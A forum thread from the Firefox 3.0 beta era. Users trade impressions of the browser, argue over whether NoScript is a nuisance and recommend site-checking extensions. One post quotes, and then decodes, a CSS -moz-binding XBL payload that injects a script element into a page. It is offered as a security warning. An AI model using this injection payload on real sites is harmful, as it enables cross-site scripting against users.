FF 3.0b3 firstrun

Hi FF users,

Seen this: https://www.mozilla.com/en-US/firefox/3.0b3/firstrun/

This is through jar.mn

pol

click pic for animation

I’m currently running FF 3.0b4 on Ubuntu 8.04. I offer a one word review:

WOW!

When it all shakes out, FF 3 is really going to be something.

You’re right about this my friend. Firefox was always kind of repulsive to me and that was only because of the aggressive methods of advertising by Firefox fanboys… I still don’t like that… but I have to say that version 3 Beta 4 works so good it is simply incredible. I don’t even pay attention to those verbal fights between Firefox users and every other browser users out there. Can’t wait to see the final release, final version 3.

Version for Windows is not that nice looking, they screwed a lot trying to mimic that overused glossy Vista look, but the version for Mac is something to talk about. It looks so good, and now it even has that native OS X look so it blends into the OS like never before. My primary browser is Safari (Mac), but after testing this Firefox 3 beta 4, I am sure both will serve me equally from now on. Speed ? I am amazed with how it renders pages, especially how it deals with Flash content (very important to me since I’m Flash developer).

This is how it looks like on Windows (not mine, someone else has posted this image in some other forum):


http://img220.imageshack.us/img220/6853/1470mg0xj6.th.jpg

And this is how it looks like on Mac (click on thumbnail to see full size image):

http://img186.imageshack.us/img186/583/picture1ya4.th.jpg

Eh, who cares about stupid fanboys, just use what you like the most. If thats IE7, so be it :slight_smile: Why not. If you prefer something else, then use that. It’s very simple. ;D

Agreed. I’m hooked to a 10/1 broadband connection, and on Hardy, FF3 really flies. I would expect similar performance on other OS’s.

By the way, I had an opportunity to use a Mac this week while visiting a client for a couple days. Very impressive indeed. If it wasn’t for my commitment to FOSS, which is why Firefox is my browser of choice, I think I’d buy one of those pretty white boxes.

Hi OrangeCrate,

But do not run FF 3.0b3 without NoScript, because the old NoScript silently does it’s work in the background preventing this, where the FF 3.0 devs left this hole:
it looks like the ever popular -moz-binding css attribute is now rendered a little less useful. It is now impossible to load off-site XBL via this method.

However, all is not lost. For in patching one of the biggest holes in Firefox’s security model, the infinite wisdom of the FF devs is that it is now possible to embed a -moz-binding URL tag inline, like this:


<img src=”blah” style=”-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)” />

Using this method provides for no use of a fragment identifier, indeed it is only possible to use the first element. The above XBL decodes to:


<?xml version=”1.0″?><bindings xmlns=”http://www.mozilla.org/xbl”><binding id=”loader”><implementation><constructor><![CDATA[var url = “alert.js”;var scr = document.createElement(”script”);scr.setAttribute(”src”,url);var bodyElement = document.getElementsByTagName(”html”).item(0);bodyElement.appendChild(scr);]]></constructor></implementation></binding></bindings>

which essentially creates a nice new DOM script element that loads alert.js.

NoScript completely protects you against this,

polonus

Of course.

:slight_smile:

But this NoScript is so annoying that’s incredible. Bugging with all kind of questions, and on the top of all those Vista’s most annoying security questions it throws at you all the time, browsing and using PC computers became nothing else but answering those questions most of the time. I don’t even use NoScript anymore, couldn’t stand it’s nature and behavior. That’s the main reason I completely switched to Safari on my Mac. But Firefox 3 looks so promising and nice, I will use it again for sure… what’s beyond me is why Mozilla team did not solve that problem and implemented NoScript into the main code of Firefox, so there would be no need of installing third party plug-in such is NoScript in the first place. Plus, maybe make it little less aggressive when it comes to asking all those questions…

On my PC machine (Vista) I never had NoScript installed (I had it while I was still on XP) and see no problems at all. ::slight_smile:

Then don’t use it.

But, I wouldn’t be without it and I get no questions at all, I have the Show message about blocked scripts unchecked I also have the Audio feedback when scripts are blocked in the Notifications tab of the Options.

Hi DavidR,

I agree totally with you. NoScript handling is so simple now, just click if you trust for instance to play a certain video, and it is allowed to run. The times that you need specific script to do something are that very rare. I cannot see what annoyance that is. If this annoys you you get even annoyed by pre-scanning a link not to land on a malicious site or pre-scan a download or have a drive-by download have its malicious way. If you only assume what you do is secure, you live out dangerously and treats the Internet like a Russian roulette - hoping the bullet does not come at you, and the next round is for the other guy. Because it is too much of a hassle, you can rely on the security after you run into malware, and hope the av scanner saves you and will solve the problem for ye, and if not you security programs are too blame, the lack of prevention did not bring you there. For me that is to live in ignorance of the real facts and just the same behavior like some driving around without a safety belt because it is so inconvenient to wear it or put it on even.

polonus

Does anybody know what happens with the FF McAfee Site Advisor extension in FF 3b4. I keep installing it but it simply goes away upon rebooting the pc. I liked it a lot especially for the advises on the Google and Yahoo searchs. Can AILWIL think of a gadget like SiteAdvisor for us? 8)

Hi gdiloren,

You could try what is proposed here:
http://forum.avast.com/index.php?topic=33717.0

pol

This has absolutely nothing with wearing a seatbelt. I have never ever even started my car without my seatbelt fastened, so for sure it can not be compared to this situation. It looks like no one can have his own opinion in this forum. After one say something, there is at least two on his back. I don’t like it and I don’t use it, so what’s wrong with that ? It’s not like I refuse to install and use firewall and antivirus on my PC machine and putting other people at risk by possibly spreading those nasties around.

OK, let’s put it this way… it is so good I use it and can’t live without it. Happy ?

Hi >,

It is a free world after all, and you are free to say that NoScript is a nuisance for you, and you are not the only one… I would like to say that a lot of IE users that understand the risks they are running would be glad if Mr Giorgio Maone had a similar protection developed to run inside IE.
And yes script inside a browser is the number ONE malware vector, and this will be so for a long, long time to come.
But it is the users that decide. Who knows that there will be a day very soon that FF 3.0 and IE8 look so identical, that FF will be phased out. Functionality and security often conflict, but they also can go hand in hand. Using it or not is your personal decision, I am not gonna comment there. On a Mac the story is quite something different. What I say is for FF on Windows…

pol

damian my friend i will wait until
http://i27.tinypic.com/zn1rvr.png
says final version :wink:
and yes i do see your garfield jpg under your first post :wink:
click on toon below to supersize ;D

Howdy Dan,

How did you know I that I would be doing the same? I have been testing the Firefox 3.0 on a user rights only account for some time, but because all my favorite extensions would not run as I liked it, and it is a developer and beta-tester version only, and they state so explicitly, I now run a normal FF build next to the latest normal Flock version. IE is exclusively for downloads (IE7). But I report here for the others that like to test it out, and wanna know what FF will have in store for us in the foreseeable future, maybe they come with a special Garfield version, although I doubt that, click the pic to see what Garfield does…

Damian

special Garfield version,
wouldn't SpeedyPC be jeolous ;)

My point was not that NoScript is not useful, I was just saying that even without it I have never had any problems… maybe I was just lucky then I don’t know. What I was trying to say is that it was annoying with questions. I don’t want to set it to silent mode, because there is no way I would ever let any application even if it’s some security program, to make decisions without me knowing what is it doing behind my back. Blocking all kind of content that sometimes maybe shouldn’t be blocked (in some specific situations) is not something I want to see.

The other thing… isn’t blocking of scripts on IE even easier than on Firefox ? You have to install some third party plug-in for Firefox, but with IE, you just have to turn off scripting.

In Internet Explorer, click the Tools menu and select Int.Options.
Click the Security tab.
With the Internet zone selected, click the Custom Level button.
Scroll down to the Scripting section.
Select “Disable” (or you can select “Prompt” if you need to allow active scripting on some pages that you know you can trust, just like I need it).
Click OK.
Click OK again to close the dialog box.

Isn’t that effect pretty much the same ?

Hi polonus, I did exactly as you said and while it worked for drweb link checker extension it didn’t work for the McAfee SiteAdvisor extension for FF. It simply disapears upon a pc reboot. While I know the FF 3 b4 version has a feature warning you on bad sites (a bit like McAfee) you have to actually click them to know it. :o

Hello gdiloren,

As siteadvisor won’t take hold, just install scandoo for a search engine, does actually the same or install finjan: https://addons.mozilla.org/en-US/firefox/addon/4892

pol